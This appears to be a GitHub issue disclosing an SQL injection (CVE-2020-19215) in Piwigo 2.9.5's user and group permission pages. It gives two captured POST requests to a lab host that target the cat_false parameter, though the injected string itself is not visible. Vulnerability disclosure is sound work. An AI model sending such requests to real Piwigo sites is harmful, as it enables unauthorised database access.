Headline
CVE-2020-19215: SQL injection in user/group permissions manager · Issue #1011 · Piwigo/Piwigo
SQL Injection vulnerability in admin/user_perm.php in piwigo v2.9.5, via the cat_false parameter to admin.php?page=user_perm.
POST /admin.php?page=group_perm&group_id=1 HTTP/1.1
Host: 10.150.10.186:30008
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30008/admin.php?page=group_perm&group_id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Cookie: pwg_id=tnnrng7j58gsgjms5hcdu2ge35
Connection: close
Upgrade-Insecure-Requests: 1
cat_false%5B%5D=11&trueify=%C2%AB
POST /admin.php?page=user_perm&user_id=1 HTTP/1.1
Host: 10.150.10.186:30008
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30008/admin.php?page=user_perm&user_id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Cookie: pwg_id=bv8q0gb8mbcqb99bhcqdlf1q20
Connection: close
Upgrade-Insecure-Requests: 1
cat_false%5B%5D=1&trueify=%C2%AB